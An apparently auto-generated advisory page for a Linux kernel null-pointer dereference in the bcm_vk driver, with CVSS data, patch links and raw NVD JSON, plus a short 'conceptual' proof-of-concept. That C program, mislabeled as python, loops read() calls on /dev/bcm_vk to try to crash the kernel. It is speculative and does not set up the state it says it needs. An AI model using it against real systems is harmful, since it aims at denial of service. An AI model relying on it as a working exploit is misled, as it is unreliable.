CVE-2025-71291

Description

In the Linux kernel, the following vulnerability has been resolved: misc: bcm_vk: Fix possible null-pointer dereferences in bcm_vk_read() In the function bcm_vk_read(), the pointer entry is checked, indicating that it can be NULL. If entry is NULL and rc is set to -EMSGSIZE, the following code may cause null-pointer dereferences: struct vk_msg_blk tmp_msg = entry->to_h_msg[0]; set_msg_id(&tmp_msg, entry->usr_msg_id); tmp_msg.size = entry->to_h_blks - 1; To prevent these possible null-pointer dereferences, copy to_h_msg, usr_msg_id, and to_h_blks from iter into temporary variables, and return these temporary variables to the application instead of accessing them through a potentially NULL entry.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel (Fixed in git commit 20f2d9dbe5e972516f8f9948d7ae5b95d1ad77bd)

Linux Kernel (Fixed in git commit 3842f93e6e29d5cc1dcb9e5bda70587b444bed69)

Linux Kernel (Prior to specific stable branch patches)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2025-71291 (Conceptual)
 * This code attempts to trigger the null-pointer dereference
 * in bcm_vk_read() by interacting with the device node.
 * Requires physical/virtual presence of the bcm_vk device.
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>

#define DEVICE_PATH "/dev/bcm_vk"

int main() {
    int fd;
    char buffer[1024];
    ssize_t bytes_read;

    printf("[+] Attempting to open %s...\n", DEVICE_PATH);
    fd = open(DEVICE_PATH, O_RDONLY);
    if (fd < 0) {
        perror("[-] Failed to open device");
        return 1;
    }

    printf("[+] Device opened. Attempting to read and trigger condition...\n");
    
    // Loop to attempt triggering the race condition or specific state
    // where entry is NULL but rc is -EMSGSIZE inside the driver.
    while (1) {
        bytes_read = read(fd, buffer, sizeof(buffer));
        
        if (bytes_read < 0) {
            if (errno == EMSGSIZE) {
                // This is the condition where the vulnerability is triggered
                printf("[!] Triggered EMSGSIZE condition, checking kernel status...\n");
            } else {
                perror("[-] Read error");
                break;
            }
        }
        
        // In a real exploit scenario, specific ioctls or preceding writes
        // might be needed to manipulate the driver state to make 'entry' NULL.
        usleep(10000);
    }

    close(fd);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-71291
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-71291
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-71291/
[4] VulDB https://vuldb.com/cve/CVE-2025-71291
[5] https://git.kernel.org/stable/c/20f2d9dbe5e972516f8f9948d7ae5b95d1ad77bd
[6] https://git.kernel.org/stable/c/3842f93e6e29d5cc1dcb9e5bda70587b444bed69
[7] https://git.kernel.org/stable/c/741c5a3a0cd893a4218fc0fc8c18403e54fcfb22
[8] https://git.kernel.org/stable/c/aa97ccc3dc1eba9f4537f0410e9dbb0b05ccf2fb
[9] https://git.kernel.org/stable/c/ba75ecb97d3f4e95d59002c13afb6519205be6cb
[10] https://git.kernel.org/stable/c/ece3722169ba93734bfd1f06255e8ab7f19fe964

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-71291", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:28.330", "lastModified": "2026-05-13T21:04:54.180", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmisc: bcm_vk: Fix possible null-pointer dereferences in bcm_vk_read()\n\nIn the function bcm_vk_read(), the pointer entry is checked, indicating\nthat it can be NULL. If entry is NULL and rc is set to -EMSGSIZE, the\nfollowing code may cause null-pointer dereferences:\n\n struct vk_msg_blk tmp_msg = entry->to_h_msg[0];\n set_msg_id(&tmp_msg, entry->usr_msg_id);\n tmp_msg.size = entry->to_h_blks - 1;\n\nTo prevent these possible null-pointer dereferences, copy to_h_msg,\nusr_msg_id, and to_h_blks from iter into temporary variables, and return\nthese temporary variables to the application instead of accessing them\nthrough a potentially NULL entry."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.19", "versionEndExcluding": "6.1.165", "matchCriteriaId": "3DD2C202-0D8D-4C7D-A980-CFCF610F7707"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.128", "matchCriteriaId": "851E9353-6C09-4CC9-877E-E09DB164A3C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.75", "matchCriteriaId": "BCE16369-98ED-41CF-8995-DFDC10B288D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/20f2d9dbe5e972516f8f9948d7ae5b95d1ad77bd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3842f93e6e29d5cc1dcb9e5bda70587b444bed69", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/741c5a3a0cd893a4218fc0fc8c18403e54fcfb22", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/aa97ccc3dc1eba9f4537f0410e9dbb0b05ccf2fb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ba75ecb97d3f4e95d59002c13afb6519205be6cb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ece3722169ba93734bfd1f06255e8ab7f19fe964", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}